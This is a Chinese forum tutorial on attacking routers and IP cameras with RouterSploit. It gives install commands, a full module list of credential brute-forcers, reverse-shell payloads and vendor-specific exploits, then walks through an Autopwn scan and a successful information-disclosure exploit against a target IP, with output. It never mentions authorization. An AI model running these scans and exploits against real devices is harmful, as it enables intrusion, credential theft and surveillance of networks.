首页
论坛
专栏
课程

[原创]使用 RouterSploit 攻击路由器的方法介绍

2019-4-16 15:00 1891

[原创]使用 RouterSploit 攻击路由器的方法介绍

2019-4-16 15:00
1891

路由器是网络连接的核心设备,但是普通用户并不会太注意路由器的安全配置问题。老的设备固件系统,默认弱口令密码和其他配置问题都会被黑客利用。而且这些利用漏洞非常简单,以至于创建自动化工具来利用这些漏洞就变得轻而易举。

在这篇文章中,我会讲述如何使用RouterSploit,这是一种自动化路由器漏洞利用工具。


路由器漏洞利用的基础知识

路由器漏洞利用的原理是破坏路由器的Wi-Fi安全性,绕过管理登录页面和访问管理功能。然后,熟练的攻击者可以在“rootkitting”中定位路由器的固件信息,其中自定义的固件信息可以被用于高级恶意功能。

根据攻击者的攻击目标分析,攻击可能包括监视用户和连接的设备,将恶意软件注入Web管理中以利用连接的设备,实现高级鱼叉式网络钓鱼攻击,并通过被利用的路由器为非法流量路由提供犯罪活动。


Cherry Blossom路由器漏洞利用工具

美国国家安全局和中央情报局等政府机构对路由器漏洞进行了囤积,ShadowBrokers在Window SMB漏洞被利用于WanaCry病毒之后发布这些路由器漏洞。现在像Cherry Blossom这样的工具在以后可能会成为路由器漏洞主流工具。

NSA和CIA的这些工具可以控制受感染路由器所在的整个局域网络,可以将它们转换为先进的无线间谍设备。

Cherry Blossom是一个rootkitting框架,其中路由器被自动利用并转换为“flytraps”。 flytraps 是一种被使用特殊固件更新的路由器,可以防止用户更新或修改新固件,被黑客广泛使用。




Cherry Blossom路由器漏洞利用工具可以控制许多“ flytraps ( 捕蝇草 )”,称为访问位于家中或目标网络中的间谍设备。 


flytraps ( 捕蝇草 )将“ beacon ”回连到“Cherryweb”的命令和控制服务器,然后由操作者通过加密的VPN隧道分配“任务”。高级模块下,比如“Windex”,可以对任何连接的目标执行恶意软件攻击,可以将 flytraps (捕蝇草) 变成一个能够从任何地方进行控制的高级远程间谍平台。




如图是Cherry Blossom显示要发送到 flytraps (捕蝇草) 设备的任务命令,包括shell代码,侦察脚本和漏洞利用代码


路由器黑客攻击活动

除了CIA关注的间谍工具之外,可以被利用的路由器和物联网设备因其路由能力而成为重要目标。RouterSploit,今天要使用的工具,不仅可以攻击路由器,它还可以用于网络摄像头和其他连接设备。

虽然CIA使用VPN连接来分析和控制服务器之间的流量,但网络犯罪分子将使用这些设备代理恶意流量以避免检测。实际上,这些被感染的路由器和物联网设备的网络作为代理攻击工具在黑市被出售,用于隐藏信用卡盗窃,暗网交易和DDoS攻击等非法活动。





路由器黑客攻击实战入门

如果拿到路由器的控制权,你将拥有对网络的完全访问权限。你可以控制目标设备的网络状况并将其路由到你想要的任何地或任何地方,或转发端口以进行远程访问。

初学者只需在RouterSploit上运行Autopwn扫描程序,也会自动检测出针对目标IP地址的一系列漏洞。

什么是RouterSploit?

RouterSploit是一个用Python写的框架,可以自动完成与路由器相关的大多数漏洞利用任务。它以Metasploit为模型,任何习惯Metasploit框架的人都会熟悉它的命令。它包含扫描和利用模块,可用于Kali Linux安装下载


与目标网络联网后,扫描后将显示是否可以通过框架轻松利用路由器,我将通过Autopwn功能快速识别路由器和连接设备上的漏洞。




安装准备

RouterSploit可以在Kali Linux下安装,也可以在Kali Raspberry Pi,macOS或Mac OS X,Windows上运行,甚至可以在root后的Android手机上运行。首先,我们需要处理一些依赖项并确保安装了Python。

第1步:安装Python和依赖项

需要确保安装了Python,并且您还需要以下一些软件包。


Python3 (with pip)
Requests
Paramiko
Beautifulsoup4
Pysnmp
Gnureadline (macOS / Mac OS X only)

你可以使用apt-get安装它们:


apt-get install python3-pip requests paramiko beautifulsoup4 pysnmp

第2步:在Mac,Kali上安装RouterSploit


要在Kali Linux上安装,请打开终端窗口并键入以下命令:


git clone https://github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

在macOS或Mac OS X上,方法类似。在终端窗口中,键入:

git clone https://github.com/threat9/routersploit
cd routersploit
sudo easy_install pip
sudo pip install -r requirements.txt

第3步:运行RouterSploit


首次运行请将计算机连接到有你要扫描的路由器的网络中,导航到RouterSploit文件夹并通过键入以下命令运行RouterSploit。


cd
cd routersploit
sudo python ./rsf.py

RouterSploit框架界面风格和Metasploit框架很相似




命令行界面可以输入简单的命令来扫描和利用路由器漏洞,可以通过键入以下命令查看RouterSploit提供的所有功能: 


show all

下面的输出中看到的有很多漏洞利用代码和扫描脚本


creds/generic/snmp_bruteforce
creds/generic/telnet_default
creds/generic/ssh_default
creds/generic/ftp_bruteforce
creds/generic/http_basic_digest_bruteforce
creds/generic/ftp_default
creds/generic/http_basic_digest_default
creds/generic/ssh_bruteforce
creds/generic/telnet_bruteforce
creds/routers/ipfire/ssh_default_creds
creds/routers/ipfire/telnet_default_creds
creds/routers/ipfire/ftp_default_creds
creds/routers/bhu/ssh_default_creds
creds/routers/bhu/telnet_default_creds
creds/routers/bhu/ftp_default_creds
creds/routers/linksys/ssh_default_creds
creds/routers/linksys/telnet_default_creds
creds/routers/linksys/ftp_default_creds
creds/routers/technicolor/ssh_default_creds
creds/routers/technicolor/telnet_default_creds
creds/routers/technicolor/ftp_default_creds
creds/routers/asus/ssh_default_creds
creds/routers/asus/telnet_default_creds
creds/routers/asus/ftp_default_creds
creds/routers/billion/ssh_default_creds
creds/routers/billion/telnet_default_creds
creds/routers/billion/ftp_default_creds
creds/routers/zte/ssh_default_creds
creds/routers/zte/telnet_default_creds
creds/routers/zte/ftp_default_creds
creds/routers/ubiquiti/ssh_default_creds
creds/routers/ubiquiti/telnet_default_creds
creds/routers/ubiquiti/ftp_default_creds
creds/routers/asmax/ssh_default_creds
creds/routers/asmax/telnet_default_creds
creds/routers/asmax/ftp_default_creds
creds/routers/asmax/webinterface_http_auth_default_creds
creds/routers/huawei/ssh_default_creds
creds/routers/huawei/telnet_default_creds
creds/routers/huawei/ftp_default_creds
creds/routers/tplink/ssh_default_creds
creds/routers/tplink/telnet_default_creds
creds/routers/tplink/ftp_default_creds
creds/routers/netgear/ssh_default_creds
creds/routers/netgear/telnet_default_creds
creds/routers/netgear/ftp_default_creds
creds/routers/mikrotik/ssh_default_creds
creds/routers/mikrotik/telnet_default_creds
creds/routers/mikrotik/ftp_default_creds
creds/routers/mikrotik/api_ros_default_creds
creds/routers/movistar/ssh_default_creds
creds/routers/movistar/telnet_default_creds
creds/routers/movistar/ftp_default_creds
creds/routers/dlink/ssh_default_creds
creds/routers/dlink/telnet_default_creds
creds/routers/dlink/ftp_default_creds
creds/routers/juniper/ssh_default_creds
creds/routers/juniper/telnet_default_creds
creds/routers/juniper/ftp_default_creds
creds/routers/comtrend/ssh_default_creds
creds/routers/comtrend/telnet_default_creds
creds/routers/comtrend/ftp_default_creds
creds/routers/fortinet/ssh_default_creds
creds/routers/fortinet/telnet_default_creds
creds/routers/fortinet/ftp_default_creds
creds/routers/belkin/ssh_default_creds
creds/routers/belkin/telnet_default_creds
creds/routers/belkin/ftp_default_creds
creds/routers/netsys/ssh_default_creds
creds/routers/netsys/telnet_default_creds
creds/routers/netsys/ftp_default_creds
creds/routers/pfsense/ssh_default_creds
creds/routers/pfsense/webinterface_http_form_default_creds
creds/routers/zyxel/ssh_default_creds
creds/routers/zyxel/telnet_default_creds
creds/routers/zyxel/ftp_default_creds
creds/routers/thomson/ssh_default_creds
creds/routers/thomson/telnet_default_creds
creds/routers/thomson/ftp_default_creds
creds/routers/netcore/ssh_default_creds
creds/routers/netcore/telnet_default_creds
creds/routers/netcore/ftp_default_creds
creds/routers/cisco/ssh_default_creds
creds/routers/cisco/telnet_default_creds
creds/routers/cisco/ftp_default_creds
creds/cameras/grandstream/ssh_default_creds
creds/cameras/grandstream/telnet_default_creds
creds/cameras/grandstream/ftp_default_creds
creds/cameras/basler/ssh_default_creds
creds/cameras/basler/webinterface_http_form_default_creds
creds/cameras/basler/telnet_default_creds
creds/cameras/basler/ftp_default_creds
creds/cameras/avtech/ssh_default_creds
creds/cameras/avtech/telnet_default_creds
creds/cameras/avtech/ftp_default_creds
creds/cameras/vacron/ssh_default_creds
creds/cameras/vacron/telnet_default_creds
creds/cameras/vacron/ftp_default_creds
creds/cameras/acti/ssh_default_creds
creds/cameras/acti/webinterface_http_form_default_creds
creds/cameras/acti/telnet_default_creds
creds/cameras/acti/ftp_default_creds
creds/cameras/sentry360/ssh_default_creds
creds/cameras/sentry360/telnet_default_creds
creds/cameras/sentry360/ftp_default_creds
creds/cameras/siemens/ssh_default_creds
creds/cameras/siemens/telnet_default_creds
creds/cameras/siemens/ftp_default_creds
creds/cameras/american_dynamics/ssh_default_creds
creds/cameras/american_dynamics/telnet_default_creds
creds/cameras/american_dynamics/ftp_default_creds
creds/cameras/videoiq/ssh_default_creds
creds/cameras/videoiq/telnet_default_creds
creds/cameras/videoiq/ftp_default_creds
creds/cameras/jvc/ssh_default_creds
creds/cameras/jvc/telnet_default_creds
creds/cameras/jvc/ftp_default_creds
creds/cameras/speco/ssh_default_creds
creds/cameras/speco/telnet_default_creds
creds/cameras/speco/ftp_default_creds
creds/cameras/iqinvision/ssh_default_creds
creds/cameras/iqinvision/telnet_default_creds
creds/cameras/iqinvision/ftp_default_creds
creds/cameras/avigilon/ssh_default_creds
creds/cameras/avigilon/telnet_default_creds
creds/cameras/avigilon/ftp_default_creds
creds/cameras/canon/ssh_default_creds
creds/cameras/canon/telnet_default_creds
creds/cameras/canon/ftp_default_creds
creds/cameras/canon/webinterface_http_auth_default_creds
creds/cameras/hikvision/ssh_default_creds
creds/cameras/hikvision/telnet_default_creds
creds/cameras/hikvision/ftp_default_creds
creds/cameras/dlink/ssh_default_creds
creds/cameras/dlink/telnet_default_creds
creds/cameras/dlink/ftp_default_creds
creds/cameras/honeywell/ssh_default_creds
creds/cameras/honeywell/telnet_default_creds
creds/cameras/honeywell/ftp_default_creds
creds/cameras/samsung/ssh_default_creds
creds/cameras/samsung/telnet_default_creds
creds/cameras/samsung/ftp_default_creds
creds/cameras/axis/ssh_default_creds
creds/cameras/axis/telnet_default_creds
creds/cameras/axis/ftp_default_creds
creds/cameras/axis/webinterface_http_auth_default_creds
creds/cameras/arecont/ssh_default_creds
creds/cameras/arecont/telnet_default_creds
creds/cameras/arecont/ftp_default_creds
creds/cameras/brickcom/ssh_default_creds
creds/cameras/brickcom/telnet_default_creds
creds/cameras/brickcom/ftp_default_creds
creds/cameras/brickcom/webinterface_http_auth_default_creds
creds/cameras/mobotix/ssh_default_creds
creds/cameras/mobotix/telnet_default_creds
creds/cameras/mobotix/ftp_default_creds
creds/cameras/geovision/ssh_default_creds
creds/cameras/geovision/telnet_default_creds
creds/cameras/geovision/ftp_default_creds
creds/cameras/stardot/ssh_default_creds
creds/cameras/stardot/telnet_default_creds
creds/cameras/stardot/ftp_default_creds
creds/cameras/cisco/ssh_default_creds
creds/cameras/cisco/telnet_default_creds
creds/cameras/cisco/ftp_default_creds
payloads/perl/bind_tcp
payloads/perl/reverse_tcp
payloads/python/bind_tcp
payloads/python/reverse_tcp
payloads/python/bind_udp
payloads/python/reverse_udp
payloads/mipsbe/bind_tcp
payloads/mipsbe/reverse_tcp
payloads/armle/bind_tcp
payloads/armle/reverse_tcp
payloads/x86/bind_tcp
payloads/x86/reverse_tcp
payloads/php/bind_tcp
payloads/php/reverse_tcp
payloads/cmd/php_reverse_tcp
payloads/cmd/python_reverse_tcp
payloads/cmd/python_bind_tcp
payloads/cmd/perl_reverse_tcp
payloads/cmd/netcat_reverse_tcp
payloads/cmd/awk_reverse_tcp
payloads/cmd/awk_bind_tcp
payloads/cmd/bash_reverse_tcp
payloads/cmd/php_bind_tcp
payloads/cmd/awk_bind_udp
payloads/cmd/netcat_bind_tcp
payloads/cmd/perl_bind_tcp
payloads/cmd/python_reverse_udp
payloads/cmd/python_bind_udp
payloads/x64/bind_tcp
payloads/x64/reverse_tcp
payloads/mipsle/bind_tcp
payloads/mipsle/reverse_tcp
scanners/autopwn
scanners/misc/misc_scan
scanners/routers/router_scan
scanners/cameras/camera_scan
exploits/generic/shellshock
exploits/generic/ssh_auth_keys
exploits/generic/heartbleed
exploits/misc/asus/b1m_projector_rce
exploits/misc/wepresent/wipg1000_rce
exploits/misc/miele/pg8528_path_traversal
exploits/routers/ipfire/ipfire_oinkcode_rce
exploits/routers/ipfire/ipfire_proxy_rce
exploits/routers/ipfire/ipfire_shellshock
exploits/routers/2wire/gateway_auth_bypass
exploits/routers/2wire/4011g_5012nv_path_traversal
exploits/routers/bhu/bhu_urouter_rce
exploits/routers/linksys/1500_2500_rce
exploits/routers/linksys/smartwifi_password_disclosure
exploits/routers/linksys/wrt100_110_rce
exploits/routers/linksys/wap54gv3_rce
exploits/routers/technicolor/tg784_authbypass
exploits/routers/technicolor/tc7200_password_disclosure_v2
exploits/routers/technicolor/dwg855_authbypass
exploits/routers/technicolor/tc7200_password_disclosure
exploits/routers/asus/infosvr_backdoor_rce
exploits/routers/asus/rt_n16_password_disclosure
exploits/routers/billion/billion_5200w_rce
exploits/routers/billion/billion_7700nr4_password_disclosure
exploits/routers/zte/f460_f660_backdoor
exploits/routers/zte/zxv10_rce
exploits/routers/ubiquiti/airos_6_x
exploits/routers/asmax/ar_1004g_password_disclosure
exploits/routers/asmax/ar_804_gu_rce
exploits/routers/huawei/hg520_info_dislosure
exploits/routers/huawei/hg866_password_change
exploits/routers/huawei/hg530_hg520b_password_disclosure
exploits/routers/huawei/e5331_mifi_info_disclosure
exploits/routers/tplink/wdr740nd_wdr740n_backdoor
exploits/routers/tplink/archer_c2_c20i_rce
exploits/routers/tplink/wdr740nd_wdr740n_path_traversal
exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure
exploits/routers/netgear/jnr1010_path_traversal
exploits/routers/netgear/n300_auth_bypass
exploits/routers/netgear/multi_password_disclosure-2017-5521
exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
exploits/routers/netgear/prosafe_rce
exploits/routers/netgear/r7000_r6400_rce
exploits/routers/netgear/multi_rce
exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal
exploits/routers/netgear/dgn2200_ping_cgi_rce
exploits/routers/mikrotik/routeros_jailbreak
exploits/routers/movistar/adsl_router_bhs_rta_path_traversal
exploits/routers/dlink/dsp_w110_rce
exploits/routers/dlink/dgs_1510_add_user
exploits/routers/dlink/dir_645_815_rce
exploits/routers/dlink/dir_815_850l_rce
exploits/routers/dlink/dir_300_320_615_auth_bypass
exploits/routers/dlink/dir_645_password_disclosure
exploits/routers/dlink/dir_850l_creds_disclosure
exploits/routers/dlink/dvg_n5402sp_path_traversal
exploits/routers/dlink/dsl_2640b_dns_change
exploits/routers/dlink/dcs_930l_auth_rce
exploits/routers/dlink/dir_825_path_traversal
exploits/routers/dlink/multi_hedwig_cgi_exec
exploits/routers/dlink/dns_320l_327l_rce
exploits/routers/dlink/dsl_2730_2750_path_traversal
exploits/routers/dlink/dsl_2750b_info_disclosure
exploits/routers/dlink/dir_300_600_rce
exploits/routers/dlink/dwl_3200ap_password_disclosure
exploits/routers/dlink/dsl_2740r_dns_change
exploits/routers/dlink/dir_8xx_password_disclosure
exploits/routers/dlink/dwr_932b_backdoor
exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
exploits/routers/dlink/dwr_932_info_disclosure
exploits/routers/dlink/dir_300_320_600_615_info_disclosure
exploits/routers/dlink/dsl_2750b_rce
exploits/routers/dlink/multi_hnap_rce
exploits/routers/dlink/dir_300_645_815_upnp_rce
exploits/routers/3com/ap8760_password_disclosure
exploits/routers/3com/imc_path_traversal
exploits/routers/3com/officeconnect_rce
exploits/routers/3com/officeconnect_info_disclosure
exploits/routers/3com/imc_info_disclosure
exploits/routers/comtrend/ct_5361t_password_disclosure
exploits/routers/fortinet/fortigate_os_backdoor
exploits/routers/multi/rom0
exploits/routers/multi/tcp_32764_rce
exploits/routers/multi/misfortune_cookie
exploits/routers/multi/tcp_32764_info_disclosure
exploits/routers/multi/gpon_home_gateway_rce
exploits/routers/belkin/g_plus_info_disclosure
exploits/routers/belkin/play_max_prce
exploits/routers/belkin/n150_path_traversal
exploits/routers/belkin/n750_rce
exploits/routers/belkin/g_n150_password_disclosure
exploits/routers/belkin/auth_bypass
exploits/routers/netsys/multi_rce
exploits/routers/shuttle/915wm_dns_change
exploits/routers/zyxel/d1000_rce
exploits/routers/zyxel/p660hn_t_v2_rce
exploits/routers/zyxel/d1000_wifi_password_disclosure
exploits/routers/zyxel/zywall_usg_extract_hashes
exploits/routers/zyxel/p660hn_t_v1_rce
exploits/routers/thomson/twg850_password_disclosure
exploits/routers/thomson/twg849_info_disclosure
exploits/routers/netcore/udp_53413_rce
exploits/routers/cisco/secure_acs_bypass
exploits/routers/cisco/catalyst_2960_rocem
exploits/routers/cisco/ucs_manager_rce
exploits/routers/cisco/unified_multi_path_traversal
exploits/routers/cisco/firepower_management60_path_traversal
exploits/routers/cisco/firepower_management60_rce
exploits/routers/cisco/video_surv_path_traversal
exploits/routers/cisco/dpc2420_info_disclosure
exploits/routers/cisco/ios_http_authorization_bypass
exploits/routers/cisco/ucm_info_disclosure
exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli
exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor
exploits/cameras/mvpower/dvr_jaws_rce
exploits/cameras/siemens/cvms2025_credentials_disclosure
exploits/cameras/avigilon/videoiq_camera_path_traversal
exploits/cameras/xiongmai/uc_httpd_path_traversal
exploits/cameras/dlink/dcs_930l_932l_auth_bypass
exploits/cameras/honeywell/hicc_1100pt_password_disclosure
exploits/cameras/brickcom/corp_network_cameras_conf_disclosure
exploits/cameras/brickcom/users_cgi_creds_disclosure
exploits/cameras/multi/P2P_wificam_credential_disclosure
exploits/cameras/multi/dvr_creds_disclosure
exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal
exploits/cameras/multi/netwave_ip_camera_information_disclosure
exploits/cameras/multi/P2P_wificam_rce
generic/bluetooth/btle_enumerate
generic/bluetooth/btle_scan
generic/bluetooth/btle_write
generic/upnp/ssdp_msearch
rsf >

 

首先将开始对目标路由器进行扫描,将检查路由器的每个漏洞是否可以被利用,它将在扫描结束时返回一个列表,其中包含对目标有效的每个漏洞。

第4步:扫描目标

我们将使用Autopwn扫描程序查找适用于我们目标的任何漏洞,找到路由器的IP地址并保存下来,大多数情况下,路由器的默认IP为192.168.0.1,但这可以改,如果你不知道,可以使用Fing或ARP扫描查找IP地址。


启动RouterSploit后,键入以下命令进入Autopwn模块:


use scanners/autopwn
show options

这与Metasploit非常相似。键入use,然后键入要使用的模块,显示选项以显示你选择的模块的变量,设置为从show options命令中看到的任何变量,最后运行以执行模块。要关闭模块并转到主屏幕,键入exit。


rsf > use scanners/autopwn
rsf (AutoPwn) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target IPv4 or IPv6 address

Module options:

   Name            Current settings     Description
   ----            ----------------     -----------
   http_port       80                   Target Web Interface Port
   http_ssl        false                HTTPS enabled: true/false
   ftp_port        21                   Target FTP port (default: 21)
   ftp_ssl         false                FTPS enabled: true/false
   ssh_port        22                   Target SSH port (default: 22)
   telnet_port     23                   Target Telnet port (default: 23)
   threads         8

在这种情况下,我们将目标设置为路由器的IP地址。键入set target,然后键入路由器的IP地址,然后按enter键。最后,键入run以开始扫描。


rsf (AutoPwn) > set target 10.11.0.4
 [+] {'target': '10.11.0.4'}
rsf (AutoPwn) > run

第5步:选择和配置EXP


扫描完成后,将显示它找到的漏洞列表,可以从此列表中选择最适合我们需求的漏洞。在这里,我们看到一个具有许多漏洞的路由器。


[*] Elapsed time:  ``9.301568031 seconds

[*] Could not verify exploitability:
 - exploits/routers/billion/5200w_rce
 - exploits/routers/cisco/catalyst_2960_rocem
 - exploits/routers/cisco/secure_acs_bypass
 - exploits/routers/dlink/dir_815_8501_rce
 - exploits/routers/dlink/dsl_2640b_dns_change
 - exploits/routers/dlink/dsl_2730b_2780b_526_dns_change
 - exploits/routers/dlink/dsl_2740r_dns_change
 - exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
 - exploits/routers/shuttle/915wm_dns_change

[*] Device is vulnerable:
 - exploits/routers/3com/3crads172_info_disclosure
 - exploits/routers/3com/officialconnect_rce
 - exploits/routers/dlink/dcs_9301_auto_rce
 - exploits/routers/dlink/dir_300_600_rce
 - exploits/routers/ipfire/ipfire_proxy_rce
 - exploits/routers/linksys/1500_2500_rce
 - exploits/routers/netgear/prosafe_rce
 - exploits/routers/zyxel/zywall_usg_extract_hashes
 - exploits/routers/dlink/dcs_9301_9321_authbypass

rsf (AutoPwn) >

可以从一些简单的漏洞利用开始,比如信息泄露。要使用此漏洞,输入以下命令。


use exploits/routers/3com/3cradsl72_info_disclosure
show options


将出现一个变量列表,可以通过键入以下内容来设置目标:


set target <target router IP>
check


设置目标IP


rsf (AutoPwn) > use exploits/routers/3com/3cradsl72_info_disclosure
show options
rsf (3Com 3CRADSL72 Info Disclosure) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target IPv4 or IPv6 address

rsf (3Com 3CRADSL72 Info Disclosure) > set target 10.11.0.4
 [+] {'target': '10.11.0.4'}
rsf (3Com 3CRADSL72 Info Disclosure) > check
/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package ... reRequestWarning: Unverified HTTPS request is being made. Adding certificate https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning)
 [+] Target is vulnerable
rsf (3Com 3CRADSL72 Info Disclosure) >

第6步:运行漏洞利用代码

输入run,进行攻击:


rsf (3Com 3CRADSL72 Info Disclosure) > run
 [*] Running module...
 [*] Sending request to download sensitive information
/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package ... reRequestWarning: Unverified HTTPS request is being made. Adding certificate https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning)
 [+] Exploit success
 [*] Reading /app_sta.stm file
<!doctype html>
<html >
<!--

_#####____####___######___####___####___##______######__#####__
_##__##__##__##__##______##_____##______##______##______##__##_
_#####___######__####_____####___####___##______####____#####__
_##______##__##__##__________##_____##__##______##______##__##_
_##______##__##__######___####___####___######__######__##__##_

We are hiring software developers! https://www.paessler.com/jobs

  -->
<head>
  <link rel="manifest" href="/public/manifest.json.htm">
  <meta httlp-equiv="X-UA-Compatible" content="IE-edge,chrome=1">
  <meta name="viewport" content="width=device-width.initial-scale">


如果漏洞利用成功,你应该会看到内部配置设置,这些设置可能会泄漏用户的登录名和密码,默认密码和设备序列号,以及其他允许破坏路由器的设置。其他模块可以远程注入代码或直接拿到 路由器密码。


一个问题:发帖怎么生成目录,一直没找到?


[推荐]看雪企服平台,提供安全分析、定制项目开发、APP等级保护、渗透测试等安全服务!

上一主题 下一主题
最新回复 (3)
Editor 2019-4-17 10:53
2
0
感谢分享~
mb_nkpusqbf 2019-4-19 22:52
4
0
做好路由器安全防护很重要啊
游客
登录 | 注册 方可回帖
返回